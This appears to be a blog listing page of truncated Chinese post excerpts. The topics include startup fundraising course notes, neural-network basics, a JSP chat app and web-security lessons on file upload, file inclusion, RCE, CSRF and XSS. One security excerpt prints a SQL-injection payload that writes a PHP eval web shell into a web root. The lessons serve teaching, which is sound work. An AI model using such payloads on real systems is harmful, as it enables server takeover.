1,Airbnb:300亿美金. 一,BP 价值: 1,优秀的BP原则: (1)UCD原则:user centered design,用户为中心的设计.站在投资人视角,回答最关心的问题. (2)清晰原则:内容表达清楚,能看懂,有完整的逻辑. (3)提炼原则:清晰表达项目亮点,能打动人. 2,看airbab的BP: (1)这个BP好在哪?为什么要这么写?(简单明了) (2)有没有发现什么问题? (3)这个BP有哪些点值得学习?(简单明了) 3,BP的整个内容: (1)首页:除了酒店,课还可以在ai…

1,分享三点:敬畏心,学习过程,带着目标学习. 2,融资是个非常专业的技术活. 3,一定不要盲目自信,在资本市场,融资永远是个小概率事件. 4,学习过程:每周解锁学习资料,固定的时间来进行作业答疑. 5,如何学好: a. 重视案例的学习(都是实战项目,知乎,头条,美团等),复盘这些项目就是最好的学习资料. b. 用好选修课.(前6周,集中训练,18周,陪跑.)用好每周的答疑和分享(提早完成作业). c. 带着目标学习.(目标:优秀(争取拿到点评),为HHR做好准备,以后是真的要实战创业的.) 6…

盛沛涵,以太白泽董事 一,基金投资的出发点: 1,这个赛道是否只有头部一两名有机会,如果不是,投的概率更大. 2,  基金投资的判断逻辑: 1.我是不是要在这个赛道布局    2.这个赛道分布如何,有没有机会跑出来一个项目 3.为什么要选择这个赛道中我们这家公司 强调项目优势1.团队层面:团队的背景&经验2.认知层面:对业务模式.竞对的理解3.业务能力:很强的落地执行力 [核心考虑清楚]为什么选择这个赛道,会选择这个赛道中什么阶段的公司,为什么选择我们 4,怎么准备融资: 融资材料准备: 1.B…

<学习之学习> 第一课:混沌初开 李善友 1,课程目标:建立个人的多元思维模型,帮助企业找到创新驱动的增长战略. 2,创新:第二曲线创新,创新理论之父熊彼特. 3,核心课:第二曲线,非连续性,第一性原理:创新管理课:产品创新,营销创新,运营创新,模式创新,组织创新,战略创新:创新思维课:物理学思维,生物学思维,美学思维. ----第一课,作业---- 未来一年(4个月)的学习目标: (1)建立自己的多元思维模型: (2)19年之前学完混沌的课程:(一个月三课)学分做到top3. (3)为以后的…

一,<开始上课> 1,投资人不愿意约见的原因:创始人没有把项目的投资价值和亮点呈现在商业计划书里. 2,BP的三个常见的错误:不够完整,关键内容没有呈现出来:华而不实:篇幅过长. 3,预热思考题: (1)BP应该从哪几方面写? (2)写BP需要一个完整的故事逻辑,你的故事逻辑是什么? (3)一个合格的BP,需要打磨多少次? 二,<你的第一张名片> 1,BP,最核心的是一个销售材料,它的使命是让投资人有兴趣购买公司的股票. 2,作品即人品,投资人都很聪明,一个清晰地用心制作的BP,投…

一,<开始学习> 1,融资的第一步:把业务一块一块的梳理清楚. 2,预热思考题: (1)投资人会问能做多大,天花板怎么算?你的答案可以得到大家的认同吗?(四种方法,直接引用,自顶向下,自底向上,参考同类) (2)你知道投资人问你商业模式的时候,应该从哪几个角度去回答吗?(盈利模式.三个角度:公司内部,bp阶段,面聊投资人) (3)我们常讲投资就是投团队,你知道投资人喜欢的团队长什么样子吗?(行业经验,完整战斗力,创始人创业or大公司北京) 3,课程大纲:4种方法计算天花板,3种方法梳理商业模式…

一,<开始学习> 1,四个思考题: (1)从你决定开始融资,到你拿到钱,你都需要经历哪些环节? (2)你知道投资机构内部的工作流程吗? (3)融资最好的时机是什么时候? (4)创投圈的专业名词,你知道多少? BP, Teaser,Datapack,FA, Pitch, Pitch Words, Memo,Mapping, IC, TS, Pre_DD,SPA. VC:venture capital 风险投资.IC:investment counselor,投资顾问. SPA:Share Pur…

一,开始 1,思考题: (1)一句话和安利文两份材料怎么准备? (2)接触资本的渠道有哪些? 二,一句话介绍: 1,优秀案列: (1)通过第一视角,服务某某行业的智能AR眼镜: (2)成立三个月GMV超千万的社交电商平台: (3)某某千人计划学者创办的人工智能仓储项目. (4)用户8000万的自由行服务平台. 2,公式:一些修饰词+一个核心词. (1)核心词:业务的本质:修饰词:业务亮点. (2)我的核心词:60秒故事短视频. (3)我的修饰词:看了让你感动流泪的, 3,我自己的一句话:看了让你…

风炫安全web安全学习第三十七节课 15种上传漏洞讲解(二) 05后缀名黑名单校验之上传.htaccess绕过 还是使用黑名单,禁止上传所有web容器能解析的脚本文件的后缀 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",&…

风炫安全WEB安全学习第三十八节课 越权漏洞演示与讲解 越权漏洞 0x01 漏洞介绍 越权漏洞的危害与影响主要是与对应业务的重要性相关,比如说某一页面服务器端响应(不局限于页面返回的信息,有时信息在响应包中,页面不一定能看见)中返回登录名.登录密码.手机号.×××等敏感信息,如果存在平行越权,通过对用户ID的遍历,就可以查看所有用户的敏感信息,这也是一种变相的脱裤,而且很难被防火墙发现,因为这和正常的访问请求没有什么区别,也不会包含特殊字符,具有十足的隐秘性. 水平越权 水平越权指的是攻击者尝试…

风炫安全web安全学习第三十三节课 文件包含漏洞基础以及利用伪协议进行攻击 文件包含漏洞 参考文章:https://chybeta.github.io/2017/10/08/php文件包含漏洞/ 分类 LFI(Local File Inclusion) 本地文件包含漏洞,顾名思义,指的是能打开并包含本地文件的漏洞.大部分情况下遇到的文件包含漏洞都是LFI.简单的测试用例如前所示. RFI(Remote File Inclusion) 远程文件包含漏洞.是指能够包含远程服务器上的文件并执行.由于远…

风炫安全web安全学习第三十一节课 命令执行以及代码执行演示 参考: http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第三十一节课-命令执行以及代/…

风炫安全web安全学习第三十节课 命令执行&代码执行基础 代码执行&命令执行 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统. 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器.防火墙.入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果.而,如果,设计者在完成该…

风炫安全web安全学习第二十九节课 CSRF防御措施 CSRF防御措施 增加token验证 对关键操作增加token验证,token值必须随机,每次都不一样 关于安全的会话管理(SESSION) 不要在客户端保存敏感信息 关闭浏览器直接销毁SESSION 设置会话过期操作,比如超过15分钟没有操作,直接销毁SESSION 访问控制的安全管理 敏感信息修改的时候需要二次验证,比如修改密码需要验证旧密码. 敏感信息修改使用POST,而不是GET 通过HTTP头部的REFERER来限制原来页面 增加验…

风炫安全WEB安全学习第二十六节课 XSS常见绕过防御技巧 XSS绕过-过滤-编码 核心思想 后台过滤了特殊字符,比如说…

风炫安全WEB安全学习第二十五节课 利用XSS键盘记录 XSS键盘记录 同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源.所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据是会被拒绝的. 同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互.这是一个用于隔离潜在恶意文件的重要安全机制. 注意,资源文件不受影响: <script src="..."> <img src="..…

风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击 XSS钓鱼攻击 HTTP Basic Authentication认证 大家在登录网站的时候,大部分时候是通过一个表单提交登录信息. 但是有时候浏览器会弹出一个登录验证的对话框,如下图,这就是使用HTTP基本认证. 在你访问一个需要HTTP Basic Authentication的URL的时候,如果你没有提供用户名和密码,服务器就会返回401,如果你直接在浏览器中打开,浏览器会提示你输入用户名和密码,也就是上面的图示. 要在发送请求的时候…

风炫安全WEB安全学习第十九节课 XSS的漏洞基础知识和原理讲解 跨站脚本攻击(Cross-site scripting,通常简称为XSS) 反射型XSS原理与演示 交互的数据不会存储在数据库里,一次性的.一般是查询导致或者是错误的js执行 存储型XSS原理与演示 交互的数据会被存放在数据库里,永久性存储,一般出现在留言板,注册等页面 Dom型XSS原理与演示 漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞.不与后台服务器产生数据交互,是一种通过DOM操作前…

风炫安全Web安全学习第十六节课 高权限sql注入getshell sql高权限getshell 前提条件: 需要知道目标网站绝对路径 目录具有写的权限 需要当前数据库用户开启了secure_file_priv select database() into outfile '/var/www/html/1.txt' allen' union select 1,'<?php eval($_GET[w]); ?>' into outfile '/var/www/html/2.php' # site…

本文搜集和整理了今日头条创业的一些关键点的资料------by 春跃(本文的主要观点都是搜集整理,所以不得本人同意不得转载) 一,18年之前的今日头条创业时间表: 1,张一鸣参与创业的履历:酷讯,饭否,99房. 2,2008年,张一鸣就一直思考如何有效的获取信息. 3,2012年,张一鸣创办了字节跳动,准备移动互联网创业. 4,相继推出产品:内涵段子,搞笑囧图,内涵漫画等12款不同的内容应用. 5,2018年8月份:推出今日头条,3个月DAU100万. 6,2012年7月,完成SIG海纳亚洲投资…

第一:<开始学习> 1,投资人看人标准:人品好:创业热情:学习能力. 2,思考题:请你预判一个最靠谱的方向来创业,你会怎么调研呢? 3,预热思考题: (1)在这个赛道,究竟有哪些重要竞争对手?能分成几类?(短视频,抖音,快手等.分成直接竞品:抖音快手,间接竞品:B站,借鉴竞品:微信,已经阵亡的产品:) (2)市场上的信息太杂了,为了完成调研,对你来说最重要的信息是什么?(最重要的是:DAU如何起量,UGC怎么解决,增长问题) (3)多数关键情报都是非公开的,不能直接搜到,你能有能力获得吗?你打…

<如何预判创业可行性>----对创业进行占卜 一,<开始学习> 1,预热思考题: (1)预判一个模式的可行性.你有一个朋友要创业,给你讲了他的创业计划,你帮他判断一下是否靠谱. (2)给你四周时间,通过收集信息和预判,选择一个你认为最有可能成功的创业方向. 2,P型创业者,passion:他属于理想型创业者,一直惦记着自己做CEO,想法憋了两年,然后就开始出来创业了.(这说的不就是我吗?) 3,L型创业者,Logical,从离职前几个月的时间,就不断地找这些行业里有经验的人聊,看行…

一,<开始学习> 1,投资人经常会问CEO:你的项目的长期壁垒是什么?你是怎么思考的? 2,三个预热思考题: (1)突然有一天,大公司要抄你,你会怎么办?  答:用增长技术来和他竞争. (2)你项目的长期壁垒是什么?你是如何发现和构建的? 答:项目的长期壁垒是:增长技术.通过不断地A/B,并学习同行够贱的. (3)你所在行业里大家竞争的稀缺资源是什么?你有办法慢慢拿到手里么? 答:会做增长的人和有A/B思维的技术人员,产品等. 所以,平时需要多接触一些头条的人. 二,<投资人眼里的护城河…

一,<开始学习> 1,行业机会的判断,是可以通过不断地训练提高自己的判准的概率的,要科学思考创业. 2,创业者在行业机会上的三个问题: a. 对市场变化,敏感性太弱,没有洞察行业的意识. b. 有行业意识,但是缺少定性判断. c. 有定性判断的能力,但是缺少对变化的定量评估,盲目自信,放大了变化. 二,<创业机会来自于哪里> 1,创业的机会本质上来自于行业的变化.一般来说,创业有两种机会:价值链的突变,大公司会在突变中失去重心,从而给创业公司很多机会:机会来自细分品牌,靠的是定位.…

人工神经元模型     S型函数(Sigmoid) 双极S型函数 神经网络可以分为哪些? 按照连接方式,可以分为:前向神经网络 vs. 反馈(递归)神经网络 按照学习方式,可以分为:有导师学习神经网络 vs. 无导师学习神经网络 按照实现功能,可以分为:拟合(回归)神经网络 vs. 分类神经网络 BP神经网络概述 Backpropagation is a common method of teaching artificial neural networks how to perform a g…

第一,开始学习: 思考题: (1)你的项目有哪些值得关注的竞争对手?为什么是这些,你是如何分类的? (2)拿出其中一个产品,你会怎么分析他? 第一,<明确调研目标>(补充) 1,调研4大类问题: (1)选择题:N个方向中选1-3个最靠谱的方向来创业. (2)解答题:验证1-3个模式可行性,通过调研直接获得答案. (3)设计题:通过调研,大幅提升设计质量和效率. (4)竞争题:监控对手,知己知彼,在竞争中胜出. 2,选择题:做好预判,选机会,亲自去调研已经在跑的产品. 3,解答题:快速验证,拿答…

BP神经网络基本原理: 误差逆传播(back propagation, BP)算法是一种计算单个权值变化引起网络性能变化的较为简单的方法.由于BP算法过程包含从输出节点开始,反向地向第一隐含层(即最接近输入层的隐含层)传播由总误差引起的权值修正,所以称为"反向传播".BP神经网络是有教师指导训练方式的多层前馈网络,其基本思想是:从网络输入节点输入的样本信号向前传播,经隐含层节点和输出层节点处的非线性函数作用后,从输出节点获得输出.若在输出节点得不到样本的期望输出,则建立样本的网络输出与…

整个界面为chat.jsp: 如果用户没有登录,就不能进行聊天. 为将发言的句子传到页面上,要设置一个<iframe></iframe>虚拟框架,将allmessage.jsp的内容转过来 而allmessage.jsp里的内容是通过application获取发言的内容.点击“发言”,会调用chat.do的servlet,  使用重定向可以将application传到allmessage.jsp chat.jsp <%@ page language="java&qu…

博客园不支持数学公式orz,我也很绝望啊!…

其实这个也没有什么好值得记录的,但是前面都记下来了,我也顺便说说吧: 1.为了方便,最好把http服务声明为超全局变量. 2.在一些地方里面,你声明的http超全局变量是用不了的,你只能用他自己内置的服务对象: public function pushLive($da, $serv) { $key = 'live_game_key'; $res = Predis::getInstance()->smembers($key); foreach ($res as $k => $v) { $serv…